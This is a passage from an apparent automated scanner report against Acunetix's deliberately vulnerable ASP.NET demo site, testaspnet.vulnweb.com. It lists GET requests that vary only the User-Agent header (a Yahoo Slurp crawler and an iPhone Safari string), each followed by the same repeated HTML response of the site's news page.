id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> <DIV class="NewsDate">posted by <strong>admin </strong> on 5/16/2019 12:32:30 PM <a href="Comments.aspx?id=0" class="NewsOperation">(83) comments</a></DIV><a href="ReadNews.aspx?id=0&NewsAd=ads/def.html" class="NewsTitle">Acunetix Vulnerability Scanner Now With Network Security Scans</a><DIV class="NewsShort">Seamless OpenVAS integration now also available on Windows and Linux</DIV><DIV class="NewsDate">posted by <strong>admin </strong> on 11/8/2005 11:37:35 AM <a href="Comments.aspx?id=3" class="NewsOperation">add comments</a></DIV><a href="ReadNews.aspx?id=3&NewsAd=ads/def.html" class="NewsTitle">Acunetix Web Vulnerability Scanner beta released!</a><DIV class="NewsShort">26 January 2005 - A beta version of Acunetix Web Vulnerability Scanner has been released today. The beta is available for download at http://www.acunetix.com/download/.</DIV><DIV class="NewsDate">posted by <strong>admin </strong> on 11/8/2005 11:35:22 AM <a href="Comments.aspx?id=2" class="NewsOperation">(31) comments</a></DIV><a href="ReadNews.aspx?id=2&NewsAd=ads/def.html" class="NewsTitle">Web attacks - can your web applications withstand the force?</a><DIV class="NewsShort">21 July 2005 - Start-up company Acunetix released Acunetix Web Vulnerability Scanner: a tool to automatically audit website security. Acunetix Web Vulnerability Scanner 2 crawls an entire website, launches popular web attacks (SQL Injection etc.) and identifies vulnerabilities that need to be fixed.</DIV></TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com
Method	GET
Parameter	Header User-Agent
Attack	Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)
Evidence
Show / hide Request and Response
Request Header - size: 216 bytes.	GET http://testaspnet.vulnweb.com HTTP/1.1 Host: testaspnet.vulnweb.com user-agent: Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) Pragma: no-cache Cache-Control: no-cache
Request Body - size: 0 bytes.
Response Header - size: 296 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=rx1kaxj5eniqzd45oujqer2j; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:51:16 GMT Content-Length: 14066
Response Body - size: 14,066 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZArjxDMCoNA8/4bzlRmUHIna4LG5" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLpus/wCAL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBOTh8PekaV12ulQ7L2d+yr9JWRLj" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> <DIV class="NewsDate">posted by <strong>admin </strong> on 5/16/2019 12:32:30 PM <a href="Comments.aspx?id=0" class="NewsOperation">(83) comments</a></DIV><a href="ReadNews.aspx?id=0&NewsAd=ads/def.html" class="NewsTitle">Acunetix Vulnerability Scanner Now With Network Security Scans</a><DIV class="NewsShort">Seamless OpenVAS integration now also available on Windows and Linux</DIV><DIV class="NewsDate">posted by <strong>admin </strong> on 11/8/2005 11:37:35 AM <a href="Comments.aspx?id=3" class="NewsOperation">add comments</a></DIV><a href="ReadNews.aspx?id=3&NewsAd=ads/def.html" class="NewsTitle">Acunetix Web Vulnerability Scanner beta released!</a><DIV class="NewsShort">26 January 2005 - A beta version of Acunetix Web Vulnerability Scanner has been released today. The beta is available for download at http://www.acunetix.com/download/.</DIV><DIV class="NewsDate">posted by <strong>admin </strong> on 11/8/2005 11:35:22 AM <a href="Comments.aspx?id=2" class="NewsOperation">(31) comments</a></DIV><a href="ReadNews.aspx?id=2&NewsAd=ads/def.html" class="NewsTitle">Web attacks - can your web applications withstand the force?</a><DIV class="NewsShort">21 July 2005 - Start-up company Acunetix released Acunetix Web Vulnerability Scanner: a tool to automatically audit website security. Acunetix Web Vulnerability Scanner 2 crawls an entire website, launches popular web attacks (SQL Injection etc.) and identifies vulnerabilities that need to be fixed.</DIV></TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com
Method	GET
Parameter	Header User-Agent
Attack	Mozilla/5.0 (iPhone; CPU iPhone OS 8_0_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12A366 Safari/600.1.4
Evidence
Show / hide Request and Response
Request Header - size: 269 bytes.	GET http://testaspnet.vulnweb.com HTTP/1.1 Host: testaspnet.vulnweb.com user-agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_0_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12A366 Safari/600.1.4 Pragma: no-cache Cache-Control: no-cache
Request Body - size: 0 bytes.
Response Header - size: 296 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=copdvs2g5gsb1z55k5w5fb45; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:51:16 GMT Content-Length: 14066
Response Body - size: 14,066 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZArjxDMCoNA8/4bzlRmUHIna4LG5" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLpus/wCAL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBOTh8PekaV12ulQ7L2d+yr9JWRLj" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> <DIV class="NewsDate">posted by <strong>admin </strong> on 5/16/2019 12:32:30 PM <a href="Comments.aspx?id=0" class="NewsOperation">(83) comments</a></DIV><a href="ReadNews.aspx?id=0&NewsAd=ads/def.html" class="NewsTitle">Acunetix Vulnerability Scanner Now With Network Security Scans</a><DIV class="NewsShort">Seamless OpenVAS integration now also available on Windows and Linux</DIV><DIV class="NewsDate">posted by <strong>admin </strong> on 11/8/2005 11:37:35 AM <a href="Comments.aspx?id=3" class="NewsOperation">add comments</a></DIV><a href="ReadNews.aspx?id=3&NewsAd=ads/def.html" class="NewsTitle">Acunetix Web Vulnerability Scanner beta released!</a><DIV class="NewsShort">26 January 2005 - A beta version of Acunetix Web Vulnerability Scanner has been released today. The beta is available for download at http://www.acunetix.com/download/.</DIV><DIV class="NewsDate">posted by <strong>admin </strong> on 11/8/2005 11:35:22 AM <a href="Comments.aspx?id=2" class="NewsOperation">(31) comments</a></DIV><a href="ReadNews.aspx?id=2&NewsAd=ads/def.html" class="NewsTitle">Web attacks - can your web applications withstand the force?</a><DIV class="NewsShort">21 July 2005 - Start-up company Acunetix released Acunetix Web Vulnerability Scanner: a tool to automatically audit website security. Acunetix Web Vulnerability Scanner 2 crawls an entire website, launches popular web attacks (SQL Injection etc.) and identifies vulnerabilities that need to be fixed.</DIV></TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" 